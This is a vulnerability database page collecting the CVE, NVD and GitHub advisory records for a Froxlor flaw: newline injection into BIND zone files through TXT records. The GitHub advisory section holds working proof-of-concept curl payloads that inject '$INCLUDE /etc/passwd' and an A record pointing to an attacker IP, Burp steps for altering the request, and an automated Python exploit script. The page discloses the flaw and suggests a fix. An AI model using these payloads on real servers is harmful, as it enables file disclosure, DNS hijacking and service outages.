Vulnerability-Lookup

CVE-2026-41234 (GCVE-0-2026-41234)

Vulnerability from cvelistv5 – Published: 2026-06-04 17:47 – Updated: 2026-06-04 19:02

Title

Froxlor: BIND Zone File Injection via TXT Record Content

Summary

Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch.

Severity

7.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-74 - Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/froxlor/froxlor/security/advis…	x_refsource_CONFIRM
https://github.com/advisories/GHSA-x6w6-2xwp-3jh6	x_refsource_MISC
https://github.com/froxlor/froxlor/releases/tag/2.3.7	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
froxlor	froxlor	Affected: < 2.3.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41234",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-04T19:01:40.718086Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-04T19:02:10.231Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "froxlor",
          "vendor": "froxlor",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.3.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-74",
              "description": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-04T17:47:12.538Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
        },
        {
          "name": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6"
        },
        {
          "name": "https://github.com/froxlor/froxlor/releases/tag/2.3.7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
        }
      ],
      "source": {
        "advisory": "GHSA-37m5-m4q3-fc6x",
        "discovery": "UNKNOWN"
      },
      "title": "Froxlor: BIND Zone File Injection via TXT Record Content"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41234",
    "datePublished": "2026-06-04T17:47:12.538Z",
    "dateReserved": "2026-04-18T03:47:03.134Z",
    "dateUpdated": "2026-06-04T19:02:10.231Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41234",
      "date": "2026-06-05",
      "epss": "0.00041",
      "percentile": "0.12723"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41234\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-04T19:16:28.963\",\"lastModified\":\"2026-06-04T20:16:57.677\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L\",\"baseScore\":7.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-74\"}]}],\"references\":[{\"url\":\"https://github.com/advisories/GHSA-x6w6-2xwp-3jh6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/froxlor/froxlor/releases/tag/2.3.7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41234\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-04T19:01:40.718086Z\"}}}], \"references\": [{\"url\": \"https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-04T19:02:04.845Z\"}}], \"cna\": {\"title\": \"Froxlor: BIND Zone File Injection via TXT Record Content\", \"source\": {\"advisory\": \"GHSA-37m5-m4q3-fc6x\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"froxlor\", \"product\": \"froxlor\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.3.7\"}]}], \"references\": [{\"url\": \"https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x\", \"name\": \"https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/advisories/GHSA-x6w6-2xwp-3jh6\", \"name\": \"https://github.com/advisories/GHSA-x6w6-2xwp-3jh6\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/froxlor/froxlor/releases/tag/2.3.7\", \"name\": \"https://github.com/froxlor/froxlor/releases/tag/2.3.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-74\", \"description\": \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-04T17:47:12.538Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41234\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-04T19:02:10.231Z\", \"dateReserved\": \"2026-04-18T03:47:03.134Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-04T17:47:12.538Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41234

Vulnerability from fkie_nvd - Published: 2026-06-04 19:16 - Updated: 2026-06-04 20:16

Severity

7.6 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/advisories/GHSA-x6w6-2xwp-3jh6
	security-advisories@github.com	https://github.com/froxlor/froxlor/releases/tag/2.3.7
	security-advisories@github.com	https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch."
    }
  ],
  "id": "CVE-2026-41234",
  "lastModified": "2026-06-04T20:16:57.677",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-04T19:16:28.963",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-74"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-37M5-M4Q3-FC6X

Vulnerability from github – Published: 2026-06-03 21:02 – Updated: 2026-06-03 21:02

Summary

Froxlor: BIND Zone File Injection via TXT Record Content

Details

Summary

The DomainZones.add API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives ($INCLUDE, $GENERATE) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.

This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.

Affected Code

lib/Froxlor/Api/Commands/DomainZones.php, lines 306-308:

} elseif ($type == 'TXT' && !empty($content)) {
    // check that TXT content is enclosed in " "
    $content = Dns::encloseTXTContent($content);
}

Dns::encloseTXTContent() (lib/Froxlor/Dns/Dns.php:571-592) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.

Line 148 of DomainZones.php still contains:

// TODO regex validate content for invalid characters

The content flows to the zone file via DnsEntry::__toString() (lib/Froxlor/Dns/DnsEntry.php:83), which concatenates $this->content directly into the zone line followed by PHP_EOL. Embedded newlines in the content produce additional lines in the zone file output.

Comparison with CVE-2026-30932 fix

The v2.3.5 fix for CVE-2026-30932 added validation functions for these types:

Type	Validation Added	Still Vulnerable?
LOC	`Validate::validateDnsLoc()` (strict regex)	No
RP	`Validate::validateDnsRp()` (domain validation)	No
SSHFP	`Validate::validateDnsSshfp()` (3-part split)	No
TLSA	`Validate::validateDnsTlsa()` (4-part split)	No
TXT	`Dns::encloseTXTContent()` (quotes only)	Yes

PoC

Environment

Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
DNS enabled (system.bind_enable=1, system.dnsenabled=1)
Customer with dnsenabled=1, domain with isbinddomain=1
Customer has an API key (or uses the web UI DNS editor with Burp)

Reproduction via API

# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "@",
      "content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Reproduction via Web UI (Burp)

Log in as a customer with DNS editing enabled
Navigate to Resources > Domains > (domain) > DNS Editor
Add a new record: Type = TXT, Record = @, Content = any
Intercept the POST request in Burp Suite
Change the dns_content parameter to: v=spf1 +all"%0a$INCLUDE /etc/passwd (%0a is URL-encoded newline)
Forward the request

Result

The API returns the generated zone content. The TXT record line is split at the newline, and $INCLUDE /etc/passwd appears on its own line as a BIND directive:

$TTL 604800
$ORIGIN testdomain.lab.
@   604800  IN  SOA  froxlor.lab admin.froxlor.lab. 2026041004 ...
@   18000   IN  TXT  "v=spf1 +all"
$INCLUDE /etc/passwd"
@   604800  IN  A    100.95.188.127
*   604800  IN  A    100.95.188.127

When the DNS rebuild cron runs, BIND processes the $INCLUDE directive and attempts to read /etc/passwd.

Variant: Arbitrary DNS record injection

The same technique injects arbitrary A/MX/CNAME records:

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "_spf",
      "content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Result:

_spf   18000  IN  TXT  "v=spf1 +all"
evil   18000  IN  A    6.6.6.6

evil.testdomain.lab now resolves to attacker IP 6.6.6.6.

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.5 TXT Zone Injection — Incomplete CVE-2026-30932 Fix"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

def api(target, key, secret, cmd, params=None):
    return requests.post(f"{target.rstrip('/')}/api.php",
        auth=(key, secret), json={"command": cmd, "params": params or {}},
        verify=False).json()

target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]

# Inject $INCLUDE
r = api(target, key, secret, "DomainZones.add", {
    "domainname": domain, "type": "TXT", "record": "@",
    "content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})

for line in r.get("data", []):
    tag = "   <-- INJECTED" if "$INCLUDE" in str(line) else ""
    if line: print(f"  {line}{tag}")

print("\nCONFIRMED" if any("$INCLUDE" in str(l) for l in r.get("data",[])) else "FAILED")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld

Impact

Information Disclosure: $INCLUDE directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via DomainZones.listing or DNS queries to records created from parsed file lines.
DNS Record Injection: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.
DNS Service Disruption: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. $GENERATE directives can create massive record sets for amplification.

Suggested Fix

Strip newlines and BIND metacharacters from TXT content. Minimal fix:

// lib/Froxlor/Api/Commands/DomainZones.php, around line 306
} elseif ($type == 'TXT' && !empty($content)) {
    // Strip characters that can break zone file format
    $content = str_replace(["\n", "\r", "\t"], '', $content);
    $content = Dns::encloseTXTContent($content);
}

A more comprehensive fix would add a validation function (similar to validateDnsLoc, validateDnsSshfp, etc.) that rejects any content containing zone metacharacters ($, newlines), and remove the TODO at line 148.

Severity

7.6 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-03T21:02:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.\n\nThis is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 306-308:\n\n```php\n} elseif ($type == \u0027TXT\u0027 \u0026\u0026 !empty($content)) {\n    // check that TXT content is enclosed in \" \"\n    $content = Dns::encloseTXTContent($content);\n}\n```\n\n`Dns::encloseTXTContent()` (`lib/Froxlor/Dns/Dns.php:571-592`) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.\n\nLine 148 of `DomainZones.php` still contains:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content flows to the zone file via `DnsEntry::__toString()` (`lib/Froxlor/Dns/DnsEntry.php:83`), which concatenates `$this-\u003econtent` directly into the zone line followed by `PHP_EOL`. Embedded newlines in the content produce additional lines in the zone file output.\n\n### Comparison with CVE-2026-30932 fix\n\nThe v2.3.5 fix for CVE-2026-30932 added validation functions for these types:\n\n| Type | Validation Added | Still Vulnerable? |\n|------|-----------------|-------------------|\n| LOC | `Validate::validateDnsLoc()` (strict regex) | No |\n| RP | `Validate::validateDnsRp()` (domain validation) | No |\n| SSHFP | `Validate::validateDnsSshfp()` (3-part split) | No |\n| TLSA | `Validate::validateDnsTlsa()` (4-part split) | No |\n| **TXT** | **`Dns::encloseTXTContent()` (quotes only)** | **Yes** |\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- DNS enabled (`system.bind_enable=1`, `system.dnsenabled=1`)\n- Customer with `dnsenabled=1`, domain with `isbinddomain=1`\n- Customer has an API key (or uses the web UI DNS editor with Burp)\n\n### Reproduction via API\n\n```bash\n# Inject $INCLUDE directive to read /etc/passwd\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"DomainZones.add\",\n    \"params\": {\n      \"domainname\": \"testdomain.lab\",\n      \"type\": \"TXT\",\n      \"record\": \"@\",\n      \"content\": \"v=spf1 +all\\\"\\n$INCLUDE /etc/passwd\",\n      \"ttl\": 18000\n    }\n  }\u0027 \\\n  https://panel.example.com/api.php\n```\n\n### Reproduction via Web UI (Burp)\n\n1. Log in as a customer with DNS editing enabled\n2. Navigate to Resources \u003e Domains \u003e (domain) \u003e DNS Editor\n3. Add a new record: Type = TXT, Record = @, Content = any\n4. Intercept the POST request in Burp Suite\n5. Change the `dns_content` parameter to: `v=spf1 +all\"%0a$INCLUDE /etc/passwd`\n   (`%0a` is URL-encoded newline)\n6. Forward the request\n\n### Result\n\nThe API returns the generated zone content. The TXT record line is split at the newline, and `$INCLUDE /etc/passwd` appears on its own line as a BIND directive:\n\n```\n$TTL 604800\n$ORIGIN testdomain.lab.\n@   604800  IN  SOA  froxlor.lab admin.froxlor.lab. 2026041004 ...\n@   18000   IN  TXT  \"v=spf1 +all\"\n$INCLUDE /etc/passwd\"\n@   604800  IN  A    100.95.188.127\n*   604800  IN  A    100.95.188.127\n```\n\nWhen the DNS rebuild cron runs, BIND processes the `$INCLUDE` directive and attempts to read `/etc/passwd`.\n\n### Variant: Arbitrary DNS record injection\n\nThe same technique injects arbitrary A/MX/CNAME records:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"command\": \"DomainZones.add\",\n    \"params\": {\n      \"domainname\": \"testdomain.lab\",\n      \"type\": \"TXT\",\n      \"record\": \"_spf\",\n      \"content\": \"v=spf1 +all\\\"\\nevil\\t18000\\tIN\\tA\\t6.6.6.6\",\n      \"ttl\": 18000\n    }\n  }\u0027 \\\n  https://panel.example.com/api.php\n```\n\nResult:\n\n```\n_spf   18000  IN  TXT  \"v=spf1 +all\"\nevil   18000  IN  A    6.6.6.6\n```\n\n`evil.testdomain.lab` now resolves to attacker IP `6.6.6.6`.\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor \u003c= 2.3.5 TXT Zone Injection \u2014 Incomplete CVE-2026-30932 Fix\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ndef api(target, key, secret, cmd, params=None):\n    return requests.post(f\"{target.rstrip(\u0027/\u0027)}/api.php\",\n        auth=(key, secret), json={\"command\": cmd, \"params\": params or {}},\n        verify=False).json()\n\ntarget, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]\n\n# Inject $INCLUDE\nr = api(target, key, secret, \"DomainZones.add\", {\n    \"domainname\": domain, \"type\": \"TXT\", \"record\": \"@\",\n    \"content\": \u0027v=spf1 +all\"\\n$INCLUDE /etc/passwd\u0027, \"ttl\": 18000})\n\nfor line in r.get(\"data\", []):\n    tag = \"   \u003c-- INJECTED\" if \"$INCLUDE\" in str(line) else \"\"\n    if line: print(f\"  {line}{tag}\")\n\nprint(\"\\nCONFIRMED\" if any(\"$INCLUDE\" in str(l) for l in r.get(\"data\",[])) else \"FAILED\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld`\n\n## Impact\n\n1. **Information Disclosure**: `$INCLUDE` directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via `DomainZones.listing` or DNS queries to records created from parsed file lines.\n\n2. **DNS Record Injection**: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.\n\n3. **DNS Service Disruption**: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. `$GENERATE` directives can create massive record sets for amplification.\n\n## Suggested Fix\n\nStrip newlines and BIND metacharacters from TXT content. Minimal fix:\n\n```php\n// lib/Froxlor/Api/Commands/DomainZones.php, around line 306\n} elseif ($type == \u0027TXT\u0027 \u0026\u0026 !empty($content)) {\n    // Strip characters that can break zone file format\n    $content = str_replace([\"\\n\", \"\\r\", \"\\t\"], \u0027\u0027, $content);\n    $content = Dns::encloseTXTContent($content);\n}\n```\n\nA more comprehensive fix would add a validation function (similar to `validateDnsLoc`, `validateDnsSshfp`, etc.) that rejects any content containing zone metacharacters (`$`, newlines), and remove the TODO at line 148.",
  "id": "GHSA-37m5-m4q3-fc6x",
  "modified": "2026-06-03T21:02:12Z",
  "published": "2026-06-03T21:02:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-37m5-m4q3-fc6x"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor: BIND Zone File Injection via TXT Record Content"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41234 (GCVE-0-2026-41234)

FKIE_CVE-2026-41234

GHSA-37M5-M4Q3-FC6X

Summary

Affected Code

Comparison with CVE-2026-30932 fix

PoC

Environment

Reproduction via API

Reproduction via Web UI (Burp)

Result

Variant: Arbitrary DNS record injection

Automated PoC Script

Impact

Suggested Fix

Tags

Sightings

Nomenclature